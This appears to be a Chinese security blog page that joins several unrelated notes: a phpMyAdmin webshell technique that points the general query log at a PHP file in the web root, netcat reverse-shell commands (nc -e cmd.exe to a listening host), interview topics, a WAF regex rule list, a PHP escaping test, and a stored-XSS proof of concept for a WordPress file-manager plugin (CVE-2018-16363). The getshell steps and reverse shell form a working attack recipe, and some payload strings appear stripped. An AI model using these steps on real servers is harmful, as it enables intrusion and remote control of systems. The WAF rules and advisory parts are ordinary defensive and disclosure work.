phpmyadmin set general_log_file getshell

#查看是否有写文件权限
show global variables like ‘%secure%’;
#select ‘‘ into outfile ‘C:/phpStudy/www/o.php’;

#查看日志文件存放路径及开启
SHOW GLOBAL VARIABLES LIKE ‘%general_log%’
set global general_log = ON

#根据上面返回的日志位置,猜出web路径,设置日志文件
SET global general_log_file=’C:/phpStudy/WWW/1.php’;
#或者访问0.0.0.0/phpinfo.php 可能看到web绝对路径

#执行sql语句
SELECT ‘‘;
SELECT ‘‘;

#下载 nc 或者直接使用菜刀
https://eternallybored.org/misc/netcat/
#nc反弹 cmd
nc -vv -l -p 端口号 #本机
nc -e cmd.exe 监听主机IP地址 端口 #服务器

#####
SET global general_log_file=’C:/phpStudy/PHPTutorial/WWW/1.php’;
SELECT ‘

不同维度面试安全工程师广度和深度

主机漏洞:提权漏洞、脏牛、bash破壳、幽灵(组合利用姿势)
框架漏洞:Thinkphp、Sprint、Struts2等
中间件漏洞:IIS、Apache、nginx、tomcat、weblgic、JBoss、docker、ImageMagick;
WEB漏洞:sql注入、xss、跨域漏洞、csrf、ssrf、盲注命令执行、XXE、反序列化(原理、检测方法、利用饶人技巧、修复方案)
APP漏洞:常见漏洞、关注点,webview组件漏洞
代码审计:审计思路,遇到的多个pop链和函数特性
内网渗透:内网常见漏洞,如何判断域控主机,拿到域内机器后思路
SDL流程:在那些节点实战过,业务紧急上线怎么做SDL
最近漏洞:关注的新漏洞及原理

web可疑访问监控规则waf规则

args:

\.\./
\:\$
\$\{
select.+(from|limit)
(?:(union(.*?)select))
having|rongjitest
sleep\((\s*)(\d*)(\s*)\)
benchmark\((.*)\,(.*)\)
base64_decode\(
(?:from\W+information_schema\W)
(?:(?:current_)user|database|schema|connection_id)\s*\(
(?:etc\/\W*passwd)
into(\s+)+(?:dump|out)file\s*
group\s+by.+\(
xwork.MethodAccessor
(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|preg_\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\(
xwork\.MethodAccessor
(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/
java\.lang
\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\[
\<(iframe|script|body|img|layer|div|meta|style|base|object|input) (onmouseover|onerror|onload)\= cookies: \.\./ \:\$ \$\{ select.+(from|limit) (?:(union(.*?)select)) having|rongjitest sleep\((\s*)(\d*)(\s*)\) benchmark\((.*)\,(.*)\) base64_decode\( (?:from\W+information_schema\W) (?:(?:current_)user|database|schema|connection_id)\s*\( (?:etc\/\W*passwd) into(\s+)+(?:dump|out)file\s* group\s+by.+\( xwork.MethodAccessor (?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|preg_\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\( xwork\.MethodAccessor (gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/ java\.lang \$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\[ post: select.+(from|limit) (?:(union(.*?)select)) having|rongjitest sleep\((\s*)(\d*)(\s*)\) benchmark\((.*)\,(.*)\) base64_decode\( (?:from\W+information_schema\W) (?:(?:current_)user|database|schema|connection_id)\s*\( (?:etc\/\W*passwd) into(\s+)+(?:dump|out)file\s* group\s+by.+\( xwork.MethodAccessor (?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|preg_\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\( xwork\.MethodAccessor (gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/ java\.lang \$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\[ \<(iframe|script|body|img|layer|div|meta|style|base|object|input) (onmouseover|onerror|onload)\= urls: \.(svn|htaccess|bash_history) \.(bak|inc|old|mdb|sql|backup|java|class)$ (vhost|bbs|host|wwwroot|www|site|root|hytop|flashfxp).*\.rar (phpmyadmin|jmx-console|jmxinvokerservlet) java\.lang /(attachments|upimg|images|css|uploadfiles|html|uploads|templets|static|template|data|inc|forumdata|upload|includes|cache|avatar)/(\\w+).(php|jsp) user_agent: (HTTrack|harvest|audit|dirbuster|pangolin|nmap|sqln|-scan|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|PycURL|zmeu|BabyKrokodil|netsparker|httperf|bench| SF/)

PHP htmlspecialchars不转义单引号只转义双引号

PHP htmlspecialchars不转义单引号只转义双引号,测试代码如下:

<?php
echo "原生:".$_GET['test']."<br>";
echo "htmlspecialchars:".htmlspecialchars($_GET['test'])."<br>"; //不转义单引号,转义其他特殊字符
echo "addslashes:".addslashes($_GET['test'])."<br>"; //转义单引号
echo "ADD:".addslashes(htmlspecialchars($_GET['test']));//合并

在处理sql注入时,使用单引号闭合的,用htmlspecialchars函数没用,应该用addslashes函数转义单引号,两个一起用修复sql注入和xss漏洞。

CVE-2018-16363 WordPress Plugin File Manager 2.9 – storage XSS

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363

file:file_folder_manager.php
code:set_transient( ‘wp_fm_lang’, $_GET[‘lang’] , 60 60 720 );

file:lib\wpfilemanager.php
code:var fmlang = ““;

poc:

request

[code]
GET /blog/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN<script>alert(1234567890)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: wordpress_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C71f1ed8075d5a34b82548bb0a92e6b6338ecf8fba0adc57da627d55f07693220; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C5fbc26f57a4eaf15c60c5840d5fa14f296e3bb1c66e567358d761a3963d1bb82; wp-settings-1=deleted; wp-settings-time-1=1535770900; PHPSESSID=501108188d8569138517f08ba9741c92
Connection: close
Upgrade-Insecure-Requests: 1
[/code]

response

[code]
HTTP/1.1 200 OK
Date: Sat, 01 Sep 2018 15:55:34 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47316



………”;var vle_nonce = “863ad12aa7”;………
[/code]

Exploit Title: WordPress Plugin File Manager 2.9 – storage type XSS
Exploit Author: ly55521
Google Dork: N/A
Type: XSS
Date: 2018-09-02
Vendor Homepage: N/A
Software Link: https://wordpress.org/plugins/wp-file-manager/
Affected Version: < 3.0
Tested on: Kali OS
CVE : CVE-2018-16363

Related links:

Update record: http://plugins.trac.wordpress.org/changeset/1936043
EXP: http://blog.51cto.com/010bjsoft/2171087
Loophole notification: https://wordpress.org/support/topic/security-concern-6/#post-10655739
safelink:https://wordpress.org/plugins/wp-file-manager/